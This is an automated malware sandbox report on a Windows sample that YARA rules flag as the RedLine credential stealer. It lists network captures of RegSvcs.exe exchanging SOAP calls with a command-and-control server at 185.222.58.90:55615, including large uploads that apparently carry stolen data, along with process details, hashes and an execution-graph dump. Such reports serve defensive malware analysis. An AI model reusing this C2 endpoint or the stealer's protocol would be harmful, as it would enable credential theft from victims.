                                                                                Dec 24, 2024 09:07:24.334849119 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.334985971 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.334995031 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335026026 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335035086 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335109949 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335119009 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335128069 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335150003 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335158110 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335213900 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335222006 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335288048 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335319996 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335396051 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335411072 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335450888 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335458994 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335535049 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335592031 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335675955 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335685015 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335695982 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335745096 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335753918 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335817099 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335824966 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335913897 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335922956 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335978985 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.335983038 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336057901 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336066008 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336152077 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336160898 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336230040 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336261034 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336268902 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336371899 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336380959 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336555958 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336565018 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336644888 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336702108 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336812973 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336822033 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336946964 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.336976051 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337023973 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337032080 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337119102 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337127924 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337234974 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337243080 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337281942 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337290049 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337317944 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337326050 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337413073 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337420940 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337429047 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337522030 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337532997 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337542057 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337563992 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337573051 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337615013 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337622881 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337656975 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337665081 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337722063 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337729931 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337738991 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337816954 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337826014 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337830067 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337960005 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337968111 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.337980986 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:24.363615990 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:25.338746071 CET5561549734185.222.58.90192.168.2.4
                                                                                Dec 24, 2024 09:07:25.393944979 CET4973455615192.168.2.4185.222.58.90
                                                                                Dec 24, 2024 09:07:25.524681091 CET4973255615192.168.2.4185.222.58.90
                                                                                Dec 24, 2024 09:07:25.525629044 CET4973455615192.168.2.4185.222.58.90
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 24, 2024 09:07:15.776485920 CET6231753192.168.2.41.1.1.1
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 24, 2024 09:07:15.776485920 CET192.168.2.41.1.1.10x5d3Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 24, 2024 09:07:15.916311979 CET1.1.1.1192.168.2.40x5d3No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                • 185.222.58.90:55615
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449730185.222.58.90556152368C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 09:07:08.943974972 CET240OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                Host: 185.222.58.90:55615
                                                                                Content-Length: 137
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Connection: Keep-Alive
                                                                                Dec 24, 2024 09:07:10.170922995 CET359INHTTP/1.1 200 OK
                                                                                Content-Length: 212
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 24 Dec 2024 08:07:09 GMT
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                Dec 24, 2024 09:07:15.229016066 CET223OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                Host: 185.222.58.90:55615
                                                                                Content-Length: 144
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Dec 24, 2024 09:07:15.649280071 CET1236INHTTP/1.1 200 OK
                                                                                Content-Length: 9593
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 24 Dec 2024 08:07:15 GMT
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>45.137.22.172</b:string><b:string>116.30.125.86</b:string><b:string>27.151.156.216</b:string><b:string>223.74.112.220</b:string><b:string>120.85.244.196</b:string><b:string>113.119.26.13</b:string><b:string>125.114.60.149</b:string><b:string>122.239.112.188</b:string><b:string>38.102.188.133</b:string><b:string>183.16.101.185</b:string><b:string>60.179.8.111</b:string><b:string>27.11.95.143</b:string><b:string>113.118.224.149</b:string><b:string>211.90.250.107</b:string><b:string>14.218.27.17</b:string><b:string>14.216.91.87</b:string><b:string>113.119.26.13</b:string><b:string>120.225.98.244 [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.449732185.222.58.90556152368C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 09:07:19.971282005 CET221OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                Host: 185.222.58.90:55615
                                                                                Content-Length: 987905
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Dec 24, 2024 09:07:22.630594969 CET294INHTTP/1.1 200 OK
                                                                                Content-Length: 147
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 24 Dec 2024 08:07:22 GMT
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.449734185.222.58.90556152368C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 09:07:22.765211105 CET241OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                Host: 185.222.58.90:55615
                                                                                Content-Length: 987897
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Connection: Keep-Alive
                                                                                Dec 24, 2024 09:07:25.338746071 CET408INHTTP/1.1 200 OK
                                                                                Content-Length: 261
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 24 Dec 2024 08:07:25 GMT
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:03:07:02
                                                                                Start date:24/12/2024
                                                                                Path:C:\Users\user\Desktop\K3xL5Xy0XS.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\K3xL5Xy0XS.exe"
                                                                                Imagebase:0x1c0000
                                                                                File size:1'058'304 bytes
                                                                                MD5 hash:6AFDD0CBDF70F3E75F423B1557648E85
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: infostealer_win_redline_strings, Description: Finds Redline samples based on characteristic strings, Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, Author: Sekoia.io
                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:03:07:06
                                                                                Start date:24/12/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\K3xL5Xy0XS.exe"
                                                                                Imagebase:0x90000
                                                                                File size:45'984 bytes
                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:03:07:06
                                                                                Start date:24/12/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:3.2%
                                                                                  Dynamic/Decrypted Code Coverage:0.9%
                                                                                  Signature Coverage:4.8%
                                                                                  Total number of Nodes:1956
                                                                                  Total number of Limit Nodes:61
                                                                                  execution_graph 94947 213a41 94951 2310c0 94947->94951 94949 213a4c 94950 2310c0 53 API calls 94949->94950 94950->94949 94956 2310cd 94951->94956 94961 2310fa 94951->94961 94952 2310fc 94995 1dfa11 53 API calls 94952->94995 94954 231101 94962 1c7510 94954->94962 94956->94952 94956->94954 94959 2310f4 94956->94959 94956->94961 94994 1cb270 39 API calls 94959->94994 94961->94949 94963 1c7525 94962->94963 94979 1c7522 94962->94979 94964 1c752d 94963->94964 94965 1c755b 94963->94965 94996 1e51c6 26 API calls 94964->94996 94967 2050f6 94965->94967 94970 1c756d 94965->94970 94971 20500f 94965->94971 95025 1e5183 26 API calls 94967->95025 94968 1c753d 94997 1dfddb 94968->94997 95013 1dfb21 51 API calls 94970->95013 94984 205088 94971->94984 95014 1dfe0b 94971->95014 94972 20510e 94972->94972 94976 1c7547 95007 1c9cb3 94976->95007 94985 1c6350 94979->94985 94980 205058 94981 1dfddb 22 API calls 94980->94981 94982 20507f 94981->94982 94983 1c9cb3 22 API calls 94982->94983 94983->94984 95024 1dfb21 51 API calls 94984->95024 94986 204a51 94985->94986 94987 1c6362 94985->94987 95051 1c4a88 22 API calls __fread_nolock 94986->95051 95041 1c6373 94987->95041 94990 1c636e 94990->94961 94991 204a5b 94992 204a67 94991->94992 95052 1ca8c7 94991->95052 94994->94961 94995->94954 94996->94968 95000 1dfde0 94997->95000 94999 1dfdfa 94999->94976 95000->94999 95003 1dfdfc 95000->95003 95026 1eea0c 95000->95026 95033 1e4ead 7 API calls 2 library calls 95000->95033 95002 1e066d 95035 1e32a4 RaiseException 95002->95035 95003->95002 95034 1e32a4 RaiseException 95003->95034 95005 1e068a 95005->94976 95008 1c9cc2 _wcslen 95007->95008 95009 1dfe0b 22 API calls 95008->95009 95010 1c9cea __fread_nolock 95009->95010 95011 1dfddb 22 API calls 95010->95011 95012 1c9d00 95011->95012 95012->94979 95013->94968 95017 1dfddb 95014->95017 95015 1eea0c ___std_exception_copy 21 API calls 95015->95017 95016 1dfdfa 95016->94980 95017->95015 95017->95016 95020 1dfdfc 95017->95020 95038 1e4ead 7 API calls 2 library calls 95017->95038 95019 1e066d 95040 1e32a4 RaiseException 95019->95040 95020->95019 95039 1e32a4 RaiseException 95020->95039 95022 1e068a 95022->94980 95024->94967 95025->94972 95028 1f3820 _abort 95026->95028 95027 1f385e 95037 1ef2d9 20 API calls _abort 95027->95037 95028->95027 95030 1f3849 RtlAllocateHeap 95028->95030 95036 1e4ead 7 API calls 2 library calls 95028->95036 95030->95028 95031 1f385c 95030->95031 95031->95000 95033->95000 95034->95002 95035->95005 95036->95028 95037->95031 95038->95017 95039->95019 95040->95022 95043 1c6382 95041->95043 95048 1c63b6 __fread_nolock 95041->95048 95042 204a82 95045 1dfddb 22 API calls 95042->95045 95043->95042 95044 1c63a9 95043->95044 95043->95048 95056 1ca587 95044->95056 95047 204a91 95045->95047 95049 1dfe0b 22 API calls 95047->95049 95048->94990 95050 204ac5 __fread_nolock 95049->95050 95051->94991 95053 1ca8ea __fread_nolock 95052->95053 95054 1ca8db 95052->95054 95053->94992 95054->95053 95055 1dfe0b 22 API calls 95054->95055 95055->95053 95057 1ca598 __fread_nolock 95056->95057 95058 1ca59d 95056->95058 95057->95048 95059 20f80f 95058->95059 95060 1dfe0b 22 API calls 95058->95060 95060->95057 95061 212a00 95075 1cd7b0 messages 95061->95075 95062 1cdb11 PeekMessageW 95062->95075 95063 1cd807 GetInputState 95063->95062 95063->95075 95064 211cbe TranslateAcceleratorW 95064->95075 95066 1cdb8f PeekMessageW 95066->95075 95067 1cdb73 TranslateMessage DispatchMessageW 95067->95066 95068 1cda04 timeGetTime 95068->95075 95069 1cdbaf Sleep 95083 1cdbc0 95069->95083 95070 212b74 Sleep 95070->95083 95071 211dda timeGetTime 95236 1de300 23 API calls 95071->95236 95072 1de551 timeGetTime 95072->95083 95075->95062 95075->95063 95075->95064 95075->95066 95075->95067 95075->95068 95075->95069 95075->95070 95075->95071 95077 1cd9d5 95075->95077 95093 1cdfd0 95075->95093 95116 1d1310 95075->95116 95172 1dedf6 95075->95172 95177 1cdd50 235 API calls 95075->95177 95178 1cbf40 95075->95178 95237 233a2a 23 API calls 95075->95237 95238 1cec40 95075->95238 95262 23359c 82 API calls __wsopen_s 95075->95262 95076 212c0b GetExitCodeProcess 95080 212c21 WaitForSingleObject 95076->95080 95081 212c37 CloseHandle 95076->95081 95078 2529bf GetForegroundWindow 95078->95083 95080->95075 95080->95081 95081->95083 95082 212a31 95082->95077 95083->95072 95083->95075 95083->95076 95083->95077 95083->95078 95083->95082 95084 212ca9 Sleep 95083->95084 95263 245658 23 API calls 95083->95263 95264 22e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95083->95264 95265 22d4dc 47 API calls 95083->95265 95084->95075 95094 1ce010 95093->95094 95104 1ce0dc messages 95094->95104 95268 1e0242 5 API calls __Init_thread_wait 95094->95268 95095 1cec40 235 API calls 95095->95104 95098 212fca 95098->95104 95269 1ca961 95098->95269 95099 1ca961 22 API calls 95099->95104 95104->95095 95104->95099 95110 1ca8c7 22 API calls 95104->95110 95111 23359c 82 API calls 95104->95111 95112 1d04f0 22 API calls 95104->95112 95113 1ce3e1 95104->95113 95266 1ca81b 41 API calls 95104->95266 95267 1da308 235 API calls 95104->95267 95276 1e0242 5 API calls __Init_thread_wait 95104->95276 95277 1e00a3 29 API calls __onexit 95104->95277 95278 1e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95104->95278 95279 2447d4 235 API calls 95104->95279 95280 2468c1 235 API calls 95104->95280 95106 212fee 95275 1e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95106->95275 95110->95104 95111->95104 95112->95104 95113->95075 95117 1d1376 95116->95117 95118 1d17b0 95116->95118 95119 216331 95117->95119 95120 1d1390 95117->95120 95409 1e0242 5 API calls __Init_thread_wait 95118->95409 95414 24709c 235 API calls 95119->95414 95281 1d1940 95120->95281 95124 1d17ba 95127 1d17fb 95124->95127 95129 1c9cb3 22 API calls 95124->95129 95126 21633d 95126->95075 95131 216346 95127->95131 95133 1d182c 95127->95133 95128 1d1940 9 API calls 95130 1d13b6 95128->95130 95137 1d17d4 95129->95137 95130->95127 95132 1d13ec 95130->95132 95415 23359c 82 API calls __wsopen_s 95131->95415 95132->95131 95157 1d1408 __fread_nolock 95132->95157 95411 1caceb 23 API calls messages 95133->95411 95136 1d1839 95412 1dd217 235 API calls 95136->95412 95410 1e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95137->95410 95140 21636e 95416 23359c 82 API calls __wsopen_s 95140->95416 95142 1d152f 95143 2163d1 95142->95143 95144 1d153c 95142->95144 95418 245745 54 API calls _wcslen 95143->95418 95145 1d1940 9 API calls 95144->95145 95147 1d1549 95145->95147 95152 1d1940 9 API calls 95147->95152 95156 1d15c7 messages 95147->95156 95148 1dfddb 22 API calls 95148->95157 95149 1dfe0b 22 API calls 95149->95157 95150 1d1872 95413 1dfaeb 23 API calls 95150->95413 95159 1d1563 95152->95159 95153 1d171d 95153->95075 95155 1cec40 235 API calls 95155->95157 95156->95150 95158 1d167b messages 95156->95158 95160 1d1940 9 API calls 95156->95160 95291 236ef1 95156->95291 95371 24959f 95156->95371 95374 23f0ec 95156->95374 95383 22d4ce 95156->95383 95386 24e505 95156->95386 95399 24958b 95156->95399 95402 1c4f39 95156->95402 95419 23359c 82 API calls __wsopen_s 95156->95419 95157->95136 95157->95140 95157->95142 95157->95148 95157->95149 95157->95155 95157->95156 95161 2163b2 95157->95161 95158->95153 95408 1dce17 22 API calls messages 95158->95408 95159->95156 95164 1ca8c7 22 API calls 95159->95164 95160->95156 95417 23359c 82 API calls __wsopen_s 95161->95417 95164->95156 95174 1dee12 95172->95174 95175 1dee09 95172->95175 95173 1dee36 IsDialogMessageW 95173->95174 95173->95175 95174->95173 95174->95175 95176 21efaf GetClassLongW 95174->95176 95175->95075 95176->95173 95176->95174 95177->95075 96443 